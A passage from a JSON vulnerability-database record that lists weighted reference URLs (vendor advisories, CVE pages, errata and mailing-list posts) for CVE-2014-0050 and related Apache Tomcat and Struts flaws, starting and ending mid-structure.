            "trust": 1.1,
            "url": "http://secunia.com/advisories/58976"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59232"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59183"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59500"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/58075"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676853"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59187"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59041"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59185"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59492"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/65400"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59039"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59725"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59399"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676656"
          },
          {
            "trust": 1.1,
            "url": "http://packetstormsecurity.com/files/127215/vmware-security-advisory-2014-0007.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59184"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676405"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-350733.htm"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/60475"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/60753"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677691"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681214"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
          },
          {
            "trust": 1.1,
            "url": "http://seclists.org/fulldisclosure/2014/dec/23"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:084"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676092"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669554"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=143136844732487\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05376917"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.ubuntu.com/usn/usn-2130-1"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2014/dsa-2856"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/532549/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://security.gentoo.org/glsa/202107-39"
          },
          {
            "trust": 1.1,
            "url": "http://mail-archives.apache.org/mod_mbox/commons-dev/201402.mbox/%3c52f373fc.9030907%40apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4322"
          },
          {
            "trust": 0.5,
            "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
          },
          {
            "trust": 0.5,
            "url": "https://bugzilla.redhat.com/):"
          },
          {
            "trust": 0.5,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0050.html"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4286"
          },
          {
            "trust": 0.5,
            "url": "https://access.redhat.com/security/team/contact/"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0373.html"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05376917"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0525.html"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0527.html"
          },
          {
            "trust": 0.4,
            "url": "https://access.redhat.com/security/updates/classification/#moderate"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0050"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/100179973"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2014/feb/41"
          },
          {
            "trust": 0.3,
            "url": "http://www.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/release/2.3.x/docs/s2-020.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.arubanetworks.com/support/alerts/aid-051414.asc"
          },
          {
            "trust": 0.3,
            "url": "http://tomcat.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "http://commons.apache.org/proper/commons-fileupload//"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21668731"
          },
          {
            "trust": 0.3,
            "url": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004740"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/bugtraq/2014/jun/151"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0401.html"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680564"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/100178813"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682645"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21669383"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675470"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21671261"
          },
          {
            "trust": 0.3,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-008/index.html"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04657823"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680714"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669021"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037189"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671330"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673004"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0459.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0526.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0528.html"
          },
          {
            "trust": 0.3,
            "url": "https://launchpad.support.sap.com/#/notes/2629535"
          },
          {
            "trust": 0.3,
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=497256000"
          },
          {
            "trust": 0.3,
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0429.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-350733.htm"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676853"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678364"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678373"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684861"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684286"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672321"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21681214,swg21680564"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670373"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670400"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682055"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004813"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688411"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670769"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680366"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671527"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21666799"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674439"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673701"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672717"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667254"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676092"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673260"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673682"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673581"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004858"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004859"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672032"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669020"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21671201"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671653"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004819"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21668978"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671684"
          },
          {
            "trust": 0.3,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4286.html"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4590"
          },
          {
            "trust": 0.3,
            "url": "http://www.hpe.com/support/security_bulletin_archive"
          },
          {
            "trust": 0.3,
            "url": "http://www.hpe.com/support/subscriber_choice"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
          },
          {
            "trust": 0.3,
            "url": "https://www.hpe.com/info/report-security-vulnerability"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4322"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0099"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0119"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/en/support/security/"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0096"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0075"
          },
          {
            "trust": 0.2,
            "url": "http://www.mandriva.com/en/support/security/advisories/"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4590"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6429"
          },
          {
            "trust": 0.2,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4322.html"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0033"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4877"
          },
          {
            "trust": 0.2,
            "url": "https://h20392.www2.hpe.com/portal/swdepot/displayproductinfo.do?productnumb"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.2,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.2,
            "url": "https://twitter.com/vmwaresrc"
          },
          {
            "trust": 0.2,
            "url": "https://www.vmware.com/support/policies/lifecycle.html"
          },
          {
            "trust": 0.2,
            "url": "http://kb.vmware.com/kb/1055"
          },
          {
            "trust": 0.2,
            "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
          },
          {
            "trust": 0.2,
            "url": "https://www.vmware.com/support/policies/security_response.html"
          },
          {
            "trust": 0.2,
            "url": "http://www.vmware.com/security/advisories"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2071"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2067"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/264.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/shiverino/npe2223"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/jrrdev/cve-2014-0050"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/31615/"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=32760"
          },
          {
            "trust": 0.1,
            "url": "https://usn.ubuntu.com/2130-1/"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=brms\u0026downloadtype=securitypatches\u0026version=6.0.1"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=bpm.suite\u0026downloadtype=securitypatches\u0026version=6.0.1"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0075"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0227"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0119"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0149.html"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0268.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0099"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0096"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0227"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-1904.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/site/documentation/en-us/red_hat_jboss_fuse/"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6430.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4517.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4517"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2172"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6429.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2192"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6430"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1904"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4152"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2035"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4152.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2172.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse\u0026downloadtype=distributions\u0026version=6.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0054.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0085.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0085"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2035.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-2192.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0054"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/team/key/#package"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/knowledge/articles/11258"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0033.html"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05356363\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5540"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5134"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4345"
          },
          {
            "trust": 0.1,
            "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5553"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5132"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5556"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05356388\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5545"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5131"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5129"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5539"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5555"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5133"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5546"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5544"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5127"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5552"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5548"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5549"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-5028"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5130"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5541"
          },
          {
            "trust": 0.1,
            "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05376917\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05390722"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5125"
          },
          {
            "trust": 0.1,
            "url": "http://advisories.mageia.org/mgasa-2014-0109.html"
          },
          {
            "trust": 0.1,
            "url": "http://svn.apache.org/r1565163"
          },
          {
            "trust": 0.1,
            "url": "http://svn.apache.org/r1565169"
          },
          {
            "trust": 0.1,
            "url": "http://www.enigmail.net/"
          },
          {
            "trust": 0.1,
            "url": "http://markmail.org/message/kpfl7ax4el2owb3o"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=2.0.1"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0094"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0112"
          },
          {
            "trust": 0.1,
            "url": "http://kb.vmware.com/kb/2081470"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0112"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0094"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/go/download-vcops"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7547"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6420"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0002"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-7285.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0003"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.mq.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0002.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-7285"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=fuse.esb.enterprise\u0026downloadtype=securitypatches\u0026version=7.1.0"
          },
          {
            "trust": 0.1,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0452.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-6440.html"
          },
          {
            "trust": 0.1,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0003.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/security/updates/classification/#important"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6440"
          },
          {
            "trust": 0.1,
            "url": "https://softwaresupport.hpe.com\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0763"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3253"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0107"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5652"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0242"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1914"
          },
          {
            "trust": 0.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-0242"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/patchmgr/findpatch.portal"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1914"
          },
          {
            "trust": 0.1,
            "url": "https://www.vmware.com/go/download-vsphere"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5885"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0033"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-201412-29.xml"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3546"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3546"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5887"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4431"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0050"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5887"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5886"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2733"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4286"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0119"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0075"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3544"
          },
          {
            "trust": 0.1,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2071"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
